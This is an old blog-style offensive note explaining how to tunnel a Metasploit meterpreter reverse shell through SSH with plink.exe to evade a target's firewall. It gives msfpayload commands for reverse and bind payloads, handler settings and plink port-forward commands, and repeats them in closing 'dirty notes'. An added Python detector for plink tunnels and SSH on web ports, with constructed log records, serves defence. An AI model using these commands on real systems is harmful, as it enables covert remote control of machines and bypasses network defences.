Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011


Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you upload your meterpreter payload and run it, the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload:
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msf.exe
  3. Drop msf.exe on your target
  4. Drop plink.exe on your target (the plink version from Quest PuTTY)
  5. Set up a msf handler:
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444
set exitonsession false
exploit -j
  • Note: Use instead of (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias

# Windows (target machine)

  1. Connect to the SSH server and set up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L
  2. Start msf.exe

You should get a meterpreter reverse shell.
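From the defender's side, the pattern described above leaves two observable traces: a plink.exe process launched with a port-forward flag (and usually an inline password and host-key auto-accept), and an SSH protocol banner on a port where a firewall expects HTTP/HTTPS. The script below is an added example and not part of the original post; it scores constructed Sysmon-style process-creation records and constructed network records (field names, paths and addresses are assumptions) and returns the findings so they can be fed to an alerting pipeline.

```python
"""Flag plink.exe-based SSH tunnels and SSH handshakes on web ports.

Added defensive example, not from the original post. The log records below
are constructed; field names follow a Sysmon-like layout (assumption).
"""

# Constructed process-creation records: image path + full command line.
PROCESS_EVENTS = [
    {"image": r"C:\Users\bob\AppData\Local\Temp\plink.exe",
     "cmdline": "plink.exe user@203.0.113.10 -pw mypass -P 443 "
                "-auto_store_key_in_cache -L 8080:localhost:8080"},
    {"image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe admin@build.example.internal -batch ls"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Constructed network records: destination, port and first bytes of the stream.
NET_EVENTS = [
    {"dst": "203.0.113.10", "dport": 443, "banner": b"SSH-2.0-OpenSSH_5.8p1"},
    {"dst": "198.51.100.7", "dport": 443, "banner": b"\x16\x03\x01\x00\xc8"},  # TLS
    {"dst": "192.0.2.22", "dport": 22, "banner": b"SSH-2.0-OpenSSH_5.8p1"},
]

FORWARD_FLAGS = {"-L", "-R", "-D"}   # plink/ssh local, remote and dynamic forwards
WEB_PORTS = {80, 443}
USER_WRITABLE = ("\\temp\\", "\\appdata\\")


def score_process(event):
    """Return the reasons a process record looks like an SSH tunnel for C2."""
    reasons = []
    image = event["image"].lower()
    if not image.endswith("\\plink.exe"):
        return reasons
    # Windows command lines here are simple enough for whitespace splitting.
    flags = {arg for arg in event["cmdline"].split() if arg.startswith("-")}
    if flags & FORWARD_FLAGS:
        reasons.append("plink with port forward (-L/-R/-D)")
    if "-pw" in flags:
        reasons.append("inline password on command line")
    if "-auto_store_key_in_cache" in flags:
        reasons.append("host key auto-accepted (no interactive prompt)")
    if any(marker in image for marker in USER_WRITABLE):
        reasons.append("plink running from a user-writable path")
    return reasons


def score_network(event):
    """Return a reason if an SSH banner shows up on a port reserved for web traffic."""
    reasons = []
    if event["banner"].startswith(b"SSH-") and event["dport"] in WEB_PORTS:
        reasons.append(f"SSH protocol banner on web port {event['dport']}")
    return reasons


def find_tunnels(process_events=PROCESS_EVENTS, net_events=NET_EVENTS):
    """Run both detectors and return (kind, subject, reasons) tuples for hits."""
    alerts = []
    for ev in process_events:
        reasons = score_process(ev)
        if reasons:
            alerts.append(("process", ev["cmdline"], reasons))
    for ev in net_events:
        reasons = score_network(ev)
        if reasons:
            alerts.append(("network", f"{ev['dst']}:{ev['dport']}", reasons))
    return alerts


if __name__ == "__main__":
    for kind, subject, reasons in find_tunnels():
        print(f"[{kind}] {subject}")
        for reason in reasons:
            print(f"    - {reason}")
```

The process detector deliberately keys on the combination of flags rather than on plink.exe alone, so a legitimate batch job from the PuTTY install directory (second record) produces no alert; the network detector needs payload visibility at the egress point, which is exactly what a port-based firewall rule lacks.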


Resilient SSH Tunneled Meterpreter Session: http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTY: http://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:


# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msfrev.exe

## target

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L

msfpayload windows/meterpreter/bind_tcp RHOST= LPORT=4444 X > /path/msfbind.exe

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -R
